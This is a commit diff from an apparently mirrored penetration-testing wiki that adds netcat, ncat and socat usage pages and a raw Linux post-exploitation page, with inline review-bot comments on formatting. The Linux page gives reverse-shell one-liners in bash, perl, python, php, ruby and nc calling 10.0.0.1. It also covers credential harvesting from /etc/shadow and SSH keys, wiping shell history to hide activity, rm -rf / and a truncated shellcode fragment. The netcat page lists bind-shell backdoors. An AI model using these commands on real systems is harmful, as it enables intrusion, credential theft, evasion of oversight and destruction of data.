mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
first whack at nav reorg
3
2besorted/bash.md
Normal file
@@ -0,0 +1,3 @@
|
||||
# Place Holder
|
||||
|
||||
Content coming. Feel free to submit ;-)
|
||||
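Review bot: the placeholder's title does not name its topic; since the file is `2besorted/bash.md`, `# Place Holder` should read `# Bash` so the nav entry this reorg creates is meaningful, and the "Content coming. Feel free to submit ;-)" line should state what the page is meant to cover so contributors know what to submit.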
23
2besorted/cats/ncat.md
Normal file
@@ -0,0 +1,23 @@
|
||||
# Ncat Usage
|
||||
|
||||
`ncat` similar to the venerable `netcat`, is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells and more! The official ncat site is http://nmap.org/ncat/.
|
||||
|
||||
The examples below are mostly copied from the http://nmap.org/book/ncat-man-examples.html page or http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat and are not a complete listing of all the examples.
|
||||
|
||||
## Commands
|
||||
| Command | Description / Importance |
|
||||
| -------- | ------------------------ |
|
||||
| `ncat example.org 8080` | Connect to example.org on TCP port 8080. |
|
||||
| `ncat -l 8080` | Listen for connections on TCP port 8080. |
|
||||
| `ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open` | Redirect TCP port 8080 on the local machine to host on port 80. |
|
||||
| `ncat --exec "/bin/bash" -l 8081 --keep-open` | Bind to TCP port 8081 and attach /bin/bash for the world to access freely. |
|
||||
| `ncat --exec "/bin/bash" --max-conns 3 --allow \`<br>`192.168.0.0/24 -l 8081 --keep-open` | Bind a shell to TCP port 8081, limit access to hosts on a local network, and limit the maximum number of simultaneous connections to 3. |
|
||||
| `ncat -l --proxy-type http localhost 8888` | Create an HTTP proxy server on localhost port 8888. |
|
||||
| `Server: ncat ClientIP 9899 < inputfile`<br>`Client: ncat -l 9899 > outputfile` | Send a file over TCP port 9899 from Server to Client. Server "pushes" the file to the Client. |
|
||||
| `Server: ncat -l 9899 < inputfile`<br>`Client: ncat ServerIP 9899 > outputfile` | Transfer in the other direction, turning Ncat into a "one file" server. Client "pulls" file from the Server. |
|
||||
| `echo -e "GET / HTTP/1.0\n\n"`|`ncat google.com 80` | Retrieve the HTML source code of the web server at google.com on TCP port 80. |
|
||||
| `ncat -t example.org 23` | Connect to example.org's telnet server on TCP port 23. |
|
||||
| `Server: ncat -l 74 --udp`<br>`Client: ncat --udp localhost 74 < inputfile` | Transfer file from client to server over UDP. |
|
||||
| `Server: ncat -l 74 --chat`<br>`Client1: ncat localhost 74`<br>`Client2: ncat localhost 74`| Simple chat. |
|
||||
| `Server: ncat -l --ssl 74 --send-only < inputfile`<br>`Client: ncat localhost 74 --ssl > outputfile` | Transfer file from server to client using SSL encryption. |
|
||||
| `ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"` | Ncat relay |
|
||||
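Review bot: the unescaped pipe in the row `` | `echo -e "GET / HTTP/1.0\n\n"`|`ncat google.com 80` | `` splits the command across two cells and breaks the two-column table; escape it as `\|` inside a single code span. Two descriptions are incomplete: `ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open` should say that local port 8080 is forwarded to example.org port 80, and the last row, `ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"`, should explain that `-o` and `-x` write the relayed session to text.txt (plain) and hex.txt (hex dump), which is what makes the relay useful for inspecting traffic. The `ncat --exec "/bin/bash" -l 8081 --keep-open` row is described as a shell "for the world to access freely", yet the very next row already shows the `--allow 192.168.0.0/24` and `--max-conns 3` form and a later row shows `--ssl`; the description should point readers to those restricted options as the way such a listener is normally run, so the unrestricted variant is not copied as-is. Minor: "exploitation matters" in the intro reads oddly; "tasks" is clearer.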
26
2besorted/cats/netcat.md
Normal file
@@ -0,0 +1,26 @@
|
||||
# Netcat Usage
|
||||
|
||||
`netcat` is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells and more! The official netcat site is http://netcat.sourceforge.net and, although Sourceforge has this repository, most Unix/Linux operating systems have a netcat application that is/can be installed via their packagers (apt-get, ports, etc.).
|
||||
|
||||
The [SANS Institute](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) has a very good "Cheat Sheet" PDF for netcat commands and functions. Please **note** that "All syntax is designed for the original netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other netcats." So, you may need to modify the commands below. Please do check out their PDF.
|
||||
|
||||
## Relays on Linux
|
||||
Before you do any of the Linux relays with netcat below, please do the following:
|
||||
``$ cd /tmp``
|
||||
``$ mknod backpipe p``
|
||||
|
||||
## Commands
|
||||
| Command | Category | Description / Importance |
|
||||
| -------- | -------- | ------------------------ |
|
||||
| `C:\> nc -l -p [LocalPort] -e relay.bat` <br> `C:\> echo nc [TargetIPaddr] [port] > relay.bat` | Relay - Windows | **Listener-to-Client Relay** - Create a relay that sends packets from the local port [LocalPort] to a netcat client connected to [TargetIPaddr] on port [port] |
|
||||
| `$ nc -l -p [LocalPort] 0<backpipe` | `nc [TargetIPaddr] [port]` | `tee backpipe` | Relay - Linux | **Listener-to-Client Relay** - Create a relay that sends packets from the local port [LocalPort] to a netcat client connected to [TargetIPaddr] on port [port] |
|
||||
| `C:\> echo nc -l -p [LocalPort_2] > relay.bat`<br>`C:\> nc -l -p [LocalPort_1] -e relay.bat` | Relay - Windows | **Listener-to-Listener Relay** - Create a relay that will send packets from any connection on {LocalPort_1] to any connection on [LocalPort_2] |
|
||||
| `$ nc -l -p [LocalPort_1] 0<backpipe` | `nc -l -p [LocalPort_2]` | `tee backpipe` | Relay - Linux | **Listener-to-Listener Relay** - Create a relay that will send packets from any connection on {LocalPort_1] to any connection on [LocalPort_2] |
|
||||
| `C:\> echo nc [NextHopIPaddr] [port2] > relay.bat`<br>`C:\> nc [PreviousHopIPaddr] [port] -e relay.bat` | Relay - Windows | **Client-to-Client Relay** - Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2] |
|
||||
| `$ nc [PreviousHopIPaddr] [port] 0<backpipe` | `nc [NextHopIPaddr] [port2]` | `tee backpipe` | Relay - Linux | **Client-to-Client Relay** - Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2] |
|
||||
| **Server:** `nc -w3 [TargetIPaddr] [port] < [infile]`<br>**Client:** `nc -l -p [LocalPort] > [outfile]` | File Transfer - All OS | Push [infile] to [TargetIPaddr] on [port] |
|
||||
| **Server:** `nc -l -p [LocalPort] < [infile]`<br>**Client:** `nc -w3 [TargetIPaddr] [port] > [outfile]` | File Transfer - All OS | Connect to [TargetIPaddr] on [port] and retrieve [outfile] |
|
||||
| `echo ""` | `nc -v -n -w1 [TargetIPaddr] [start_port] [end_port]` | TCP Banner Grabber | Attempt to connect to each port in a range from [end_port] to [start_port] on [TargetIPaddr]. Then send a blank string to the open port and print out any banner received in response. |
|
||||
| `nc -v -n -z -w1 [TargetIPaddr] [start_port] [end_port]` | TCP Port Scanner | Attempt to connect to each port in a range from [end_port] tp [start_port] on IP address [TargetIPaddr]. |
|
||||
| `$ nc -l -p [LocalPort] -e /bin/bash` | Backdoor - Linux | Listening backdoor shell for a Linux computer. Use a netcat client to connect to the target's IP address on the [LocalPort] and you will get a BASH shell. |
|
||||
| `$ nc -l -p [LocalPort] -e cmd.exe` | Backdoor - Windows | Listening backdoor shell for a Windows computer. Use a netcat client to connect to the target's IP address on the [LocalPort] and you will get a CMD shell. |
|
||||
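Review bot: the Windows Listener-to-Client relay row lists its commands in the wrong order: `C:\> nc -l -p [LocalPort] -e relay.bat` comes before `C:\> echo nc [TargetIPaddr] [port] > relay.bat`, so nc would be told to execute a file that does not exist yet; the other two Windows relay rows create relay.bat first and this one should match them. The three Linux relay rows and the banner-grabber row contain unescaped `|` characters inside the command (for example `$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe`), which the markdown renderer reads as cell separators, pushing "Relay - Linux" out of the Category column; escape them as `\|`. The setup step `$ cd /tmp` followed by `$ mknod backpipe p` creates a fixed-name FIFO in a world-writable directory, where another local user can pre-create or replace the file; suggest a private directory from `mktemp -d` and the more portable `mkfifo`. Typos: `{LocalPort_1]` appears twice and should be `[LocalPort_1]`, and "tp [start_port]" should be "to [start_port]".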
31
2besorted/cats/socat.md
Normal file
@@ -0,0 +1,31 @@
|
||||
# socat Usage
|
||||
|
||||
`socat` or SOcket CAT, similar to the venerable `netcat`, is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells, SSL transport, IPv6 networking and more! The official socat site is http://www.dest-unreach.org/socat/.
|
||||
|
||||
An important piece to understand about `socat` is that the format of the command is: `socat [options] <address> <address>` where `<address>` is in a special format. Check out the docs here http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_TYPES for more information.
|
||||
|
||||
The examples below are mostly copied from the http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLES page or http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES and are not a complete listing of all the examples.
|
||||
|
||||
## Commands
|
||||
| Command | Description / Importance |
|
||||
| -------- | ------------------------ |
|
||||
| `socat - TCP4:www.domain.org:80` | Transfers data between STDIO (-) and a TCP4 connection to port 80 of host www.domain.org. This example results in an interactive connection similar to telnet or netcat. The stdin terminal parameters are not changed, so you may close the relay with ^D or abort it with ^C. |
|
||||
| `socat -d -d READLINE,history=$HOME/.http_history \`<br>`TCP4:www.domain.org:www,crnl` | This is similar to the previous example, but you can edit the current line in a bash like manner (READLINE) and use the history file .http_history; socat prints messages about progress (-d -d). The port is specified by service name (www), and correct network line termination characters (crnl) instead of NL are used. |
|
||||
| `socat TCP4-LISTEN:www TCP4:www.domain.org:www` | Installs a simple TCP port forwarder. With TCP4-LISTEN it listens on local port "www" until a connection comes in, accepts it, then connects to the remote host (TCP4) and starts data transfer. It will not accept a second connection. |
|
||||
| `socat -d -d -lmlocal2 TCP4-LISTEN:80,bind=myaddr1, \`<br>`su=nobody,fork,range=10.0.0.0/8,reuseaddr \`<br>`TCP4:www.domain.org:80,bind=myaddr2` | TCP port forwarder, each side bound to another local IP address (bind). This example handles an almost arbitrary number of parallel or consecutive connections by fork'ing a new process after each accept() . It provides a little security by su'ing to user nobody after forking; it only permits connections from the private 10 network (range); due to reuseaddr, it allows immediate restart after master process's termination, even if some child sockets are not completely shut down. With -lmlocal2, socat logs to stderr until successfully reaching the accept loop. Further logging is directed to syslog with facility local2. |
|
||||
| `socat TCP4-LISTEN:5555,fork,tcpwrap=script \`<br>`EXEC:/bin/myscript,chroot=/home/sandbox,su-d=sandbox,pty,stderr` | A simple server that accepts connections (TCP4-LISTEN) and fork's a new child process for each connection; every child acts as single relay. The client must match the rules for daemon process name "script" in /etc/hosts.allow and /etc/hosts.deny, otherwise it is refused access (see "man 5 hosts_access"). For EXEC'uting the program, the child process chroot's to /home/sandbox, su's to user sandbox, and then starts the program /home/sandbox/bin/myscript. Socat and myscript communicate via a pseudo tty (pty); myscript's stderr is redirected to stdout, so its error messages are transferred via socat to the connected client. |
|
||||
| `socat EXEC:"mail.sh target@domain.com",fdin=3,fdout=4 \`<br>`TCP4:mail.relay.org:25,crnl,bind=alias1.server.org,mss=512` | mail.sh is a shell script, distributed with socat, that implements a simple SMTP client. It is programmed to "speak" SMTP on its FDs 3 (in) and 4 (out). The fdin and fdout options tell socat to use these FDs for communication with the program. Because mail.sh inherits stdin and stdout while socat does not use them, the script can read a mail body from stdin. Socat makes alias1 your local source address (bind), cares for correct network line termination (crnl) and sends at most 512 data bytes per packet (mss). |
|
||||
| `socat -,raw,echo=0,escape=0x0f /dev/ttyS0,raw,echo=0,crnl` | Opens an interactive connection via the serial line, e.g. for talking with a modem. Raw and echo set the console's and ttyS0's terminal parameters to practicable values, crnl converts to correct newline characters. Escape allows to terminate the socat process with character control-O. Consider using READLINE instead of the first address. |
|
||||
| `socat UNIX-LISTEN:/tmp/.X11-unix/X1,fork \`<br>`SOCKS4:host.victim.org:127.0.0.1:6000,socksuser=nobody,sourceport=20` | With UNIX-LISTEN, socat opens a listening UNIX domain socket /tmp/.X11-unix/X1. This path corresponds to local XWindow display :1 on your machine, so XWindow client connections to DISPLAY=:1 are accepted. Socat then speaks with the SOCKS4 server host.victim.org that might permit sourceport 20 based connections due to an FTP related weakness in its static IP filters. Socat pretends to be invoked by socksuser nobody, and requests to be connected to loopback port 6000 (only weak sockd configurations will allow this). So we get a connection to the victims XWindow server and, if it does not require MIT cookies or Kerberos authentication, we can start work. Please note that there can only be one connection at a time, because TCP can establish only one session with a given set of addresses and ports. |
|
||||
| `socat -u /tmp/readdata,seek-end=0,ignoreeof -` | This is an example for unidirectional data transfer (-u). Socat transfers data from file /tmp/readdata (implicit address GOPEN), starting at its current end (seek-end=0 lets socat start reading at current end of file; use seek=0 or no seek option to first read the existing data) in a "tail -f" like mode (ignoreeof). The "file" might also be a listening UNIX domain socket (do not use a seek option then). |
|
||||
| `(sleep 5; echo PASSWORD; sleep 5; echo ls; sleep 1)` | <br>`socat - EXEC:'ssh -l user server',pty,setsid,ctty` | EXEC'utes an ssh session to server. Uses a pty for communication between socat and ssh, makes it ssh's controlling tty (ctty), and makes this pty the owner of a new process group (setsid), so ssh accepts the password from socat. |
|
||||
| `socat -u TCP4-LISTEN:3334,reuseaddr,fork \`<br>`OPEN:/tmp/in.log,creat,append` | Implements a simple network based message collector. For each client connecting to port 3334, a new child process is generated (option fork). All data sent by the clients are appended to the file /tmp/in.log. If the file does not exist, socat creates it. Option reuseaddr allows immediate restart of the server process. |
|
||||
| `socat READLINE,noecho='[Pp]assword:' \`<br>`EXEC:'ftp ftp.server.com',pty,setsid,ctty` | Wraps a command line history (READLINE) around the EXEC'uted ftp client utility. This allows editing and reuse of FTP commands for relatively comfortable browsing through the ftp directory hierarchy. The password is echoed! pty is required to have ftp issue a prompt. Nevertheless, there may occur some confusion with the password and FTP prompts. |
|
||||
| `socat TCP4-LISTEN:2022,reuseaddr,fork \`<br>`PROXY:proxy:www.domain.org:22,proxyport=3128,proxyauth=user:pass` | Starts a forwarder that accepts connections on port 2022, and directs them through the proxy daemon listening on port 3128 (proxyport) on host proxy, using the CONNECT method, where they are authenticated as "user" with "pass" (proxyauth). The proxy should establish connections to host www.domain.org on port 22 then. |
|
||||
| `socat - SSL:server:4443,cafile=server.crt,cert=client.pem` | An OpenSSL client that tries to establish a secure connection to an SSL server. Option cafile specifies a file that contains trust certificates: we trust the server only when it presents one of these certificates and proofs that it owns the related private key. Otherwise the connection is terminated. With cert a file containing the client certificate and the associated private key is specified. This is required in case the server wishes a client authentication; many Internet servers do not. The first address ('-') can be replaced by almost any other socat address. |
|
||||
| `socat SSL-LISTEN:4443,reuseaddr,pf=ip4,fork,\`<br>`cert=server.pem,cafile=client.crt PIPE` | An OpenSSL server that accepts TCP connections, presents the certificate from the file server.pem and forces the client to present a certificate that is verified against cafile.crt. The second address ('PIPE') can be replaced by almost any other socat address. For instructions on generating and distributing OpenSSL keys and certificates see the additional socat document socat-openssl.txt. |
|
||||
| `socat tcp-l:7777,reuseaddr,fork system:'filan -i 0 -s >&2',nofork` | Listens for incoming TCP connections on port 7777. For each accepted connection, invokes a shell. This shell has its stdin and stdout directly connected to the TCP socket (nofork). The shell starts filan and lets it print the socket addresses to stderr (your terminal window). |
|
||||
| `socat - tcp:www.blackhat.org:31337,readbytes=1000` | Connects to an unknown service and prevents being flooded. |
|
||||
| `socat TCP:host2:4443 TUN:192.168.255.1/24,up` | Establishes one side of a virtual (but not private!) network with host2 where a similar process might run, with UDP-L and tun address 192.168.255.2. They can reach each other using the addresses 192.168.255.1 and 192.168.255.2. Note that streaming eg. via TCP or SSL does not guarantee to retain packet boundaries and may thus cause packet loss. |
|
||||
| `socat TCP-LISTEN:80,reuseaddr,fork,su=nobody \`<br>`TCP:www.dmz.mydomain.org:80` | Relay TCP port 80 from everywhere (internet, intranet, dmz) through your firewall to your DMZ webserver (like plug-gw) listen on port 80; whenever a connection is made, fork a new process (parent process keeps accepting connections), su to nobody, and connect to www.dmz.mydomain.org on port 80. Attention: this is a substitute for a reverse proxy without providing application level security. |
|
||||
| `socat -lm -d -d TCP-LISTEN:25,bind=fw.dmz.mydomain.org, \`<br>`fork,su=nobody,range=smtp.dmz.mydomain.org/32 \`<br>`TCP:smtp.intra.mydomain.org:25` | Relay mail from your DMZ server through your firewall. Accept connections only on dmz interface and allow connections only from smtp.dmz.mydomain.org. The advantages over plug-gw and other relays are: * you can bind to an IP address (even an alias), therefore enhance security * in your OS you can create several IP aliases and bind another socat daemon to each, making several application servers addressable * lots of options, like switching user, chroot, IP performance tuning * no need for inetd. |
|
||||
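Review bot: the ssh row is split by its own pipe character: `(sleep 5; echo PASSWORD; sleep 5; echo ls; sleep 1)` and `<br>socat - EXEC:'ssh -l user server',pty,setsid,ctty` land in separate cells and the description shifts right, so the command column is unreadable; escape the pipe as `\|`. The same row needs a caveat in its description: the password is part of the command line, so it is written to shell history and is visible to other local users in the process list while the subshell runs; key-based authentication avoids both. Two descriptions disagree with their commands: the SSL-LISTEN row says the client certificate "is verified against cafile.crt" while the command passes `cafile=client.crt`, and the TUN row describes the peer as running "with UDP-L" although this side uses `TCP:host2:4443`, which needs a TCP-LISTEN peer. Typo: "proofs that it owns" should be "proves that it owns".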
331
2besorted/gdoc_linux.md
Normal file
@@ -0,0 +1,331 @@
|
||||
|
||||
# Linux Google Doc Content #
|
||||
|
||||
The content below is the raw data from the Google Doc that was first used to collect it. Over time, this content will be moved into sub-pages and organized but is placed here, now, so as to be more complete. We apologize for its appearance.
|
||||
|
||||
----
|
||||
|
||||
## System
|
||||
| Command | Description / Importance |
|
||||
| ------- | ------------------------ |
|
||||
| `uname -a` | Prints the kernel version, arch, sometimes distro, ... |
|
||||
| `ps aux` | List all running processes |
|
||||
| `top -n 1 -d` | Print process, 1 is a number of lines |
|
||||
| `id` | Your current username, groups |
|
||||
| `arch, uname -m` | Kernel processor architecture |
|
||||
| `w` | who is connected, uptime and load avg |
|
||||
| `who -a` | uptime, runlevel, tty, proceses etc. |
|
||||
| `gcc -v` | Returns the version of GCC. |
|
||||
| `mysql --version` | Returns the version of MySQL. |
|
||||
| `perl -v` | Returns the version of Perl. |
|
||||
| `ruby -v` | Returns the version of Ruby. |
|
||||
| `python --version` | Returns the version of Python. |
|
||||
| `df -k` | mounted fs, size, % use, dev and mount point |
|
||||
| `mount` | mounted fs |
|
||||
| `last -a` | Last users logged on |
|
||||
| `lastcomm` | |
|
||||
| `lastlog` | |
|
||||
| `lastlogin (BSD)` | |
|
||||
| `getenforce` | Get the status of SELinux (Enforcing, Permissive or Disabled) |
|
||||
| `dmesg` | Informations from the last system boot |
|
||||
| `lspci` | prints all PCI buses and devices |
|
||||
| `lsusb` | prints all USB buses and devices/h |
|
||||
| `lscpu` | prints CPU information |
|
||||
| `lshw` | |
|
||||
| `ex` | |
|
||||
| `cat /proc/cpuinfo` | |
|
||||
| `cat /proc/meminfo` | |
|
||||
| `du -h --max-depth=1 /` | (note: can cause heavy disk i/o) |
|
||||
| `which nmap` | locate a command (ie nmap or nc) |
|
||||
| `locate bin/nmap` | |
|
||||
| `locate bin/nc` | |
|
||||
| `jps -l` | |
|
||||
| `java -version` | Returns the version of Java. |
|
||||
|
||||
|
||||
|
||||
## Networking
|
||||
hostname -f
|
||||
ip addr show
|
||||
ip ro show
|
||||
ifconfig -a
|
||||
route -n
|
||||
cat /etc/network/interfaces
|
||||
iptables -L -n -v
|
||||
iptables -t nat -L -n -v
|
||||
ip6tables -L -n -v
|
||||
iptables-save
|
||||
netstat -anop
|
||||
netstat -r
|
||||
netstat -nltupw (root with raw sockets)
|
||||
arp -a
|
||||
lsof -nPi
|
||||
to resume it ? "cat /proc/net/*" (more discreet)
|
||||
what does the above mean? -> It means that all the information given by the above commands can be found by looking into the files under /proc/net , and that this approach is less likely to trigger monitoring or other stuff.
|
||||
User accounts
|
||||
local accounts: cat /etc/passwd
|
||||
password hashes in /etc/shadow on Linux
|
||||
password hashes in /etc/security/passwd on AIX
|
||||
groups in /etc/group (and/or /etc/gshadow on Linux)
|
||||
all accounts: getent passwd
|
||||
should dump local, LDAP, NIS, whatever the system is using
|
||||
same with getent group
|
||||
Samba's own database: pdbedit -L -w or pdbedit -L -v
|
||||
privileged accounts: cat
|
||||
(above: cat ???)
|
||||
mail aliases: cat /etc/aliases find /etc -name aliases, getent aliases
|
||||
NIS accounts: ypcat passwd - displays NIS password file
|
||||
|
||||
Credentials
|
||||
SSH keys, often passwordless: /home/*/.ssh/id*
|
||||
SSH agent:
|
||||
|
||||
Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
|
||||
PGP keys: /home/*/.gnupg/secring.gpgs
|
||||
|
||||
Configs
|
||||
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/nullte
|
||||
cat /etc/issue{,.net}
|
||||
cat /etc/master.passwd
|
||||
cat /etc/group
|
||||
cat /etc/hosts
|
||||
cat /etc/crontab
|
||||
cat /etc/sysctl.conf
|
||||
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
|
||||
cat /etc/resolv.conf
|
||||
cat /etc/syslog.conf
|
||||
cat /etc/chttp.conf
|
||||
cat /etc/lighttpd.conf
|
||||
cat /etc/cups/cupsd.confcda
|
||||
cat /etc/inetd.conf
|
||||
cat /opt/lampp/etc/httpd.conf
|
||||
cat /etc/samba/smb.conf
|
||||
cat /etc/openldap/ldap.conf
|
||||
cat /etc/ldap/ldap.conf
|
||||
cat /etc/exports
|
||||
cat /etc/auto.master
|
||||
cat /etc/auto_master
|
||||
cat /etc/fstab
|
||||
find /etc/sysconfig/ -type f -exec cat {} \;
|
||||
|
||||
Determine Distro
|
||||
lsb_release -d # Generic command for all LSB distros
|
||||
/etc/os-release # Generic for distros using "systemd"
|
||||
/etc/issue # Generic but often modified
|
||||
cat /etc/*release
|
||||
/etc/SUSE-release # Novell SUSE
|
||||
/etc/redhat-release, /etc/redhat_version # Red Hat
|
||||
/etc/fedora-release # Fedora
|
||||
/etc/slackware-release, /etc/slackware-version # Slackware
|
||||
/etc/debian_release, /etc/debian_version # Debian
|
||||
/etc/mandrake-release # Mandrake
|
||||
/etc/sun-release # Sun JDS
|
||||
/etc/release # Solaris/Sparc
|
||||
/etc/gentoo-release # Gentoo
|
||||
/etc/arch-release # Arch Linux (file will be empty)
|
||||
arch # OpenBSD; sample: "OpenBSD.amd64"
|
||||
uname -a # often hints at it pretty well
|
||||
|
||||
Installed Packages
|
||||
rpm -qa --last | head
|
||||
yum list | grep installed
|
||||
Debian: dpkg -l
|
||||
dpkg -l | grep -i "linux-image"
|
||||
dpkg --get-selections
|
||||
{Free,Net}BSD: pkg_info
|
||||
Solaris: pkginfo
|
||||
Gentoo: # equery must be installed
|
||||
cd /var/db/pkg/ && ls -d */* # always works
|
||||
Arch Linux: pacman -Q
|
||||
|
||||
Package Sources
|
||||
cat /etc/apt/sources.list
|
||||
ls -l /etc/yum.repos.d/
|
||||
cat /etc/yum.conf
|
||||
|
||||
Finding Important Files
|
||||
ls -dlR */ #
|
||||
ls -alR | grep ^d
|
||||
find /var -type d
|
||||
ls -dl `find /var -type d`
|
||||
ls -dl `find /var -type d` | grep -v root
|
||||
find /var ! -user root -type d -ls
|
||||
find /var/log -type f -exec ls -la {} \;
|
||||
find / -perm -4000 (find all suid files)
|
||||
ls -alhtr /mnt
|
||||
ls -alhtr /media
|
||||
ls -alhtr /tmp
|
||||
ls -alhtr /home
|
||||
cd /home/; treels /home/*/.ssh/*
|
||||
find /home -type f -iname '.*history'
|
||||
ls -lart /etc/rc.d/
|
||||
locate tar | grep [.]tar$ # Remember to updatedb before running locate
|
||||
locate tgz | grep [.]tgz$
|
||||
locate sql | grep [.]sql$
|
||||
locate settings | grep [.]php$
|
||||
locate config.inc | grep [.]php$
|
||||
ls /home/*/id*
|
||||
.properties | grep [.]properties # java config files
|
||||
locate .xml | grep [.]xml # java/.net config files
|
||||
find /sbin /usr/sbin /opt /lib `echo $PATH | 'sed s/:/ /g'` -perm /6000 -ls # find suids
|
||||
locate rhosts
|
||||
Covering Your Tracks
|
||||
Avoiding history filesmys
|
||||
export HISTFILE=
|
||||
or
|
||||
unset HISTFILE
|
||||
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:
|
||||
|
||||
However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
|
||||
clear all history in ram
|
||||
history -c
|
||||
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
|
||||
touch ~/.bash_history (invasive)
|
||||
<space> history -c (using a space before a command)
|
||||
zsh% unset HISTFILE HISTSIZE
|
||||
tcsh% set history=0
|
||||
bash$ set +o history
|
||||
ksh$ unset HISTFILE
|
||||
find / -type f -exec {} (forensics nightmare)
|
||||
|
||||
Note that you're probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
|
||||
|
||||
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$'ing the shell. Sometimes the shell can be configured to run 'history -w' after every command; get around this by overriding 'history' with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
|
||||
Obtain users' information
|
||||
ls -alh /home/*/
|
||||
ls -alh /home/*/.ssh/
|
||||
cat /home/*/.ssh/authorized_keys
|
||||
cat /home/*/.ssh/known_hosts
|
||||
cat /home/*/.*hist* # you can learn a lot from this
|
||||
find /home/*/.vnc /home/*/.subversion -type f
|
||||
grep ^ssh /home/*/.*hist*
|
||||
grep ^telnet `/home/*/.*hist*
|
||||
grep ^mysql /home/*/.*hist*
|
||||
cat /home/*/.viminfo
|
||||
sudo -l # if sudoers is not. readable, this sometimes works per user
|
||||
crontab -l
|
||||
cat /home/*/.mysql_history
|
||||
|
||||
Escalating
|
||||
Looking for possible opened paths
|
||||
ls -alh /root/
|
||||
sudo -l
|
||||
cat /etc/sudoers
|
||||
cat /etc/shadow
|
||||
cat /etc/master.passwd # OpenBSD
|
||||
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
|
||||
lsof -nPi
|
||||
ls /home/*/.ssh/*
|
||||
|
||||
Maintaining control
|
||||
Reverse Shell
|
||||
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
|
||||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).
|
||||
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
|
||||
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
|
||||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
xterm -display 10.0.0.1:1se
|
||||
Listener- Xnest :1
|
||||
Add permission to connect- xhost +victimIP
|
||||
ssh -NR 3333:localhost:22 user@yourhost
|
||||
nc -e /bin/sh 10.0.0.1 1234
|
||||
|
||||
Fun if Windows is present and accessible
|
||||
If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.
|
||||
TODO: insert details on what to look for
|
||||
|
||||
Stuff to be sorted
|
||||
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
|
||||
|
||||
Command
|
||||
Output
|
||||
ps aux
|
||||
List of running processes
|
||||
id
|
||||
List current user and group along with user/group id
|
||||
w
|
||||
Show info about who is logged, what are they are doing
|
||||
who -a
|
||||
Print information about users
|
||||
cat /dev/core > /dev/audio
|
||||
|
||||
cat /dev/mem > /dev/audio
|
||||
Makes a sound from the memory content.
|
||||
Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)
|
||||
sudo -p
|
||||
allows the user to define what the password prompt will be
|
||||
(useful for fun customization with aliases or shell scripts)
|
||||
Deleting and Destroying
|
||||
(If it is necessary to leave the machine inaccessible or unusable)
|
||||
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
|
||||
|
||||
Oh, and you're probably a jerk if you use any of the stuff below.
|
||||
Command
|
||||
Description
|
||||
rm -rf /
|
||||
This will recursively try to delete all files.
|
||||
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
|
||||
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
|
||||
|
||||
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
|
